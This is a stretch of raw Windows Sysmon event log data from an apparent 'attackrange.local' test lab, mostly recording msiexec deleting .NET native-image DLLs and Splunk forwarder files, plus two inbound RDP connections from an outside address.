AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\EAYU1JY9XH\System.Data.ni.dll.auxMD5=5CC55A1FB0ED0B2E4990B312C4B725FE,SHA256=E4F07260DA1EDD653B5722AD4A712DB0C80D31B1FF8D5BFA1E84C9C9EBD19604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:20.500{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\EAYU1JY9XH\System.Data.ni.dllMD5=917B1F2CBE25C534CE4664A904F7190E,SHA256=6380182C7F6247A0367F455C729212CEF38C5889E7D510AD2DBB52AF8A4C4621,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:20.453{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=32F18135E127DDAC8DBB695A1184073F,SHA256=A83109643BE3210BA2D97ADD6E72114F0304D69D0B76D699BFE4935FD16B6A16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:20.344{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\EABENLFM6M\System.DirectoryServices.ni.dll.auxMD5=3F78814829D895D032A8BD034ACE4450,SHA256=A2410DA4E27BDAB67B07FAA49D57B73FAFD6C9DABBEBB8331FF6EE5CA5FFFA6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:20.344{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\EABENLFM6M\System.DirectoryServices.ni.dllMD5=1F105E423E686DDFAD34327F2AF3859B,SHA256=0874D66BCBCEAD079A9FCFCAFEE49B361520D911054D0AB30933CE1E42178235,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:20.281{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\DQ0CTC4XJA\System.Management.ni.dll.auxMD5=254EF8FA44D2C6C2AD30F0C72E5FEA4A,SHA256=2091BB513D8D335CDA0E9879BDCE2623ADB6DFA2EB4DA62A22A611D750AE0289,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:20.281{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\DQ0CTC4XJA\System.Management.ni.dllMD5=1D3FD15AB1501C7E7C5C71E84216E0FB,SHA256=CA07A2DF2BC440D714F53F4F9DA622C0797587E77677C1A9C4B6B01BE01E07ED,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:20.266{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\DKA1IUKHFB\System.Management.ni.dll.auxMD5=9E113C3F173739443B36B19DD5C6669B,SHA256=E6D1A62EA7C191912AA011D805E8000EE89FE7281E888EF7A398F4FBA9AC4182,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:20.266{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\DKA1IUKHFB\System.Management.ni.dllMD5=545B093E8C7408982436090E8E13BA3C,SHA256=CFFD545D318D02B523B06E28AFD09A3649D013965B45986CFCAEE54A07AF0C1A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:20.219{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\DFL33BDURP\System.DirectoryServices.ni.dll.auxMD5=91B2F2790B225E9B80B1642A87D19DA5,SHA256=F23B64863222A016CF4439EEDC90057CFEC21BC75A0D7D8118CE8996F42E8B98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:20.219{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\DFL33BDURP\System.DirectoryServices.ni.dllMD5=EB699F153BF3322C608FA8EC593641AC,SHA256=C88E1D58C19711E2951ACAD7EFB6D6F420D52D13C93B77B4E80B36396EB5AF10,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:20.141{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\DF4KZD5CX5\System.ServiceProcess.ni.dll.auxMD5=FB48CBD15429C7B1F9A14E82CDF8B24D,SHA256=E11D297738EB6EFD68E74B919FC25F124C6CC4AE3E1C7595BB224BF4567C30FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:20.141{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\DF4KZD5CX5\System.ServiceProcess.ni.dllMD5=52E1C1642839FB780CD29C337867C549,SHA256=5823F6CC6549B5FE1FDFF03DCF1B95DFAFDE9D381C04D3C8F5BDCC636A053E54,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:20.125{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\DCA6J3LQZZ\System.Configuration.Install.ni.dll.auxMD5=22196DA6CAA793E0616864B9E8E06643,SHA256=86EFE97B8AA4DF629552A36B9B701A6CD96D95EE747F1BA761E6A5A0843BF33F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:20.125{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\DCA6J3LQZZ\System.Configuration.Install.ni.dllMD5=01A04115F66EDC890D89E9961D365FE4,SHA256=FA2900C83867BCB722E6481BB9070C704EF1D68ED20252F7D1EB3B6DAA320439,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:20.125{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\D98CT5T0HL\System.ni.dll.auxMD5=D1633EB12C3BA6976EC07A4F63B7C5D2,SHA256=FA5EA8271FEEF900EBBA55412AEC8CFE63AB04812C2277AB6C43A89807631658,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:20.125{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\D98CT5T0HL\System.ni.dllMD5=E6629F608804427DCE9CA7252AA92C23,SHA256=B6699D00ACE64600A90372DFA28089254BE1430D11AA8906B8E7B8C7884E0CBA,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000049998Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:20.939{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE67B16E235DF3F77348F1054D04C6DF,SHA256=BFBBE663F24C50176F44AF407FB2051403D2216AD5A01BD38B50864D97A083A8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049997Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:17.834{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58458-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000072875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.875{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\F1R0DZWR68\System.ni.dll.auxMD5=83A798F75378B58F303737DDEA2A82DA,SHA256=5298F68DF0A59A3273E50A7379FFC8130F7A59630FDB9708C5599AEEED598B11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.875{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\F1R0DZWR68\System.ni.dllMD5=7BF417CEFA7114803F9790E7F77CFE53,SHA256=BCFAC92FEE902A98C44D030324FC9DC31524AD816184D660C26EA48C910E0783,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.656{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\EZQS3Z3PKI\System.Management.ni.dll.auxMD5=9E113C3F173739443B36B19DD5C6669B,SHA256=E6D1A62EA7C191912AA011D805E8000EE89FE7281E888EF7A398F4FBA9AC4182,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.641{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\EZQS3Z3PKI\System.Management.ni.dllMD5=545B093E8C7408982436090E8E13BA3C,SHA256=CFFD545D318D02B523B06E28AFD09A3649D013965B45986CFCAEE54A07AF0C1A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.625{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\EZG4G5DGOJ\WindowsBase.ni.dll.auxMD5=CE451180C26759B1028E3A902C17F85E,SHA256=5AC69F8930094C256A2A4CA5A979682EABBA3BC3AB7DD7F8C2844ED726B91AD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.625{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\EZG4G5DGOJ\WindowsBase.ni.dllMD5=BD60B125B9BEF727540A7D61965BAA66,SHA256=A7053DEFC3CF04D3182513BA4E94DA8400513083D146E6FBC67B3E6A213B7137,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.547{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\EXPS2KV3DT\System.Core.ni.dll.auxMD5=9D050BEFC0EDCA0AC4ABF20376FA0FE5,SHA256=DA8CA881AB535F16D75059E1A0BD90FC8602D4549C17EBBED9870D7CFF6B6CE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.547{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\EXPS2KV3DT\System.Core.ni.dllMD5=2041735ACCF4A0D44DDE0F13495434C0,SHA256=E12DF0280703B65BC806F70DC05590E33A48732C852ACF4D8A738F9D625218A1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.469{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=32E63E9B2F1168F6F456A0D8540D8DB2,SHA256=4348551A3EDBCDC30CA4EBFF0675E9B403AFB947F01F344E6EDCD83823893AEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.313{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\ETLOCP7CIU\System.Management.ni.dll.auxMD5=A1123A272EA45D0BE152C0EEBD6784E2,SHA256=5B0E627B5F7CFC5A685543302698C7882E396403C78E13DE7A7443221A86F536,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.313{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\ETLOCP7CIU\System.Management.ni.dllMD5=1EE419429DFC6FD092EA7828ED535BFB,SHA256=66C905BB59A36F4F0D862B6C9C7125C212BCD31DC12821EEB4B7B72994CAA787,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.297{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\ESD5USV53U\System.IO.Compression.FileSystem.ni.dll.auxMD5=F4A1A9F448D8081CE864ACA2BE6078F0,SHA256=AA8B0EB7C8260304C5F8FEEEFD3711382ABEB7B49BDC2A7836E30B95601C7130,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.297{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\ESD5USV53U\System.IO.Compression.FileSystem.ni.dllMD5=4D09B7B8869461AE2CE6EF317D352683,SHA256=979C8FB3B516F86588AF859C6985EE6EBF9A829F1E7CCB723908FECD08B6C98D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.281{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\EMT96RIEL3\System.Numerics.ni.dll.auxMD5=8C8F36DCBC0AB4F29DC79D33D9CD7240,SHA256=48D6097F83178C3905EC2BCDA01C80CFFB1A832CB1F0BF5F08E510C86D6F9215,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.281{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\EMT96RIEL3\System.Numerics.ni.dllMD5=845E361BD51C969466956F80361DE179,SHA256=1BFFC23BB5882DA343969E12ABE4FC89BBC0EC41D9C30E7DDBCA7ACF250A2752,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.281{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\EIJ3YY2MF2\System.ni.dll.auxMD5=8AA30EF5A6FFA51F166D232C8B76A3CF,SHA256=CF2BEA95501884BCC9E3BE072E7006CE2316CE0C086748105EB2216B8512721C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.281{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\EIJ3YY2MF2\System.ni.dllMD5=355F6BCC3F1F0142682CAE2AE9AD5128,SHA256=04A3A69D1F5E94F84A13485DE67472FAE17746F6D655E051C378723343B734FF,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.000{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\EHOK4E7N9M\System.ni.dll.auxMD5=3DF95B0C71238F8146AA10A2DAD2FF34,SHA256=37835EDC93EF2E6E5A3DCCEB99509FE5DBFB049D835C64B2D74B792024156EA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.000{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\EHOK4E7N9M\System.ni.dllMD5=88C9F3A6A000DB567901CC188925D7C0,SHA256=5E1C43C87ACA9EEB778AC9BF91CBB976049A472F3AE41BAA6F82E498803796B8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000049999Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:21.970{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BA9FA12659BC3170B9EFFA3319A144A,SHA256=69EFAC691369ECA8AF77DCDDE022897A1C84BB3790A301595CE108ED9679A321,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:22.828{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\FW9MK8UIY5\System.Data.ni.dll.auxMD5=2AB656FB5268C785EF923D3EE5459128,SHA256=C0A8E0011E3037F316B88BED6DF66543AAB3B178F62A39F6070B5670248F67F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:22.828{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\FW9MK8UIY5\System.Data.ni.dllMD5=93CE7584E855F6AFBB0E78492FD58849,SHA256=8091F64043891CCB2D0FDC3FA0B9670D53F3444C7B6250340DE846628448DFA0,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:22.641{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\FVG9I175L6\System.Xml.ni.dll.auxMD5=8095866932D116E9C54CB06A279A8C87,SHA256=ED3F11FAC5D38FB2CDD797B3031E7D49EFB7BD44DBF9355ABABA43B82CA46466,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:22.641{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\FVG9I175L6\System.Xml.ni.dllMD5=016FE7AF94AF0BFB824D63F6B0688E43,SHA256=AE20EA6C343733690F1BB9B5963AEA624FFB3B86FAC697FA4C16A753363B291C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:22.484{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CC38DB19F5C8971EDAA9A4356DE7B58,SHA256=FF2623B2773FD874D373811E228E1C8F27523D19600895761761FF512F02ED26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:22.484{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=27659934AA609E1F8745853AB4AAF9E2,SHA256=61B433CBF14AD2BC39EBC33216C6DD416CFD4FBA12ECC6C0FC7171B3338982FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:22.391{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\FOGJRDHHJ8\System.Configuration.Install.ni.dll.auxMD5=DFEE9A07D29D011E5C90B8528DA018EA,SHA256=4D719B04BC17977086E3C97ED6DDE6D64193831715F3671EDBB40F39E3684887,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:22.391{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\FOGJRDHHJ8\System.Configuration.Install.ni.dllMD5=FDAA71B0FD121959A938C6CE35450216,SHA256=0D969086369893119F98A8FA80E3A2CF52CE193BBB4C617BC777FDEF295AC069,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:22.375{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\FKBOD29XUR\System.Security.ni.dll.auxMD5=8BA8863BEEC87568AAC3B366897D0D32,SHA256=D0E77250356D5D825C484FEE34BBC25BD06C6D1AECC9292A0E3B3DD14FF4B081,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:22.375{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\FKBOD29XUR\System.Security.ni.dllMD5=E050C5A89D23FE6EED7B86C3271787F5,SHA256=1045BCADAF25EAA099C264222B8AB242EC71EF1500EE5C524B2F2D6232D4F3C1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:22.359{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\FK8KVELJLD\System.Data.ni.dll.auxMD5=9A6ECBF9E54407755BC7A46CC31C1903,SHA256=AB66C7611BE08DAACE1216C27356E58F5FBA629E0D55564BB48C68566CA7DAE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:22.359{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\FK8KVELJLD\System.Data.ni.dllMD5=C803FD0E8E41B8E4D88B5A805756F020,SHA256=6F56D02E25E27523A86510764F1EA2827AECD9BF4B1B7385CCD2F24940FB4718,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:22.188{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\F9LKXV5EN8\System.ni.dll.auxMD5=5B314DACE0CD48E791031B93EFEBB413,SHA256=5D2290D3508F6D1F4FE644AAC53333AFFB5F08F3EDBECFF6B39B3A4AFAB3B6C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:22.188{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\F9LKXV5EN8\System.ni.dllMD5=CFEAD2F9FBBBC856CC066EDF87EACCD6,SHA256=C7594D5B6C3886ABC31EA390BDEAAE0753669682020DCE90F51B0209E9649048,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000050001Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:19.581{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62892-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050000Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:22.251{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D19A6BD6FE09DF25AA1092E47E757CA4,SHA256=20EEE18F26E4C39C5D4599F660C3FD5975547689BACF8B37104887CB672471F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:23.844{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\HGDQMPXGQ7\System.Web.ni.dll.auxMD5=F70CFE77E87F55A4FB36DAB40447C16E,SHA256=C4FBD72EABC752EDB93372AADFEF11DAAA4BD9299569721BD28D962590520BC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:23.844{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\HGDQMPXGQ7\System.Web.ni.dllMD5=F79C500CAC32075017619FD8994AE0F4,SHA256=21CE1E3E0ED6F59044FA08BE14CE93325A1AB45F1E334B7233718A455BFA4637,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:23.422{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT 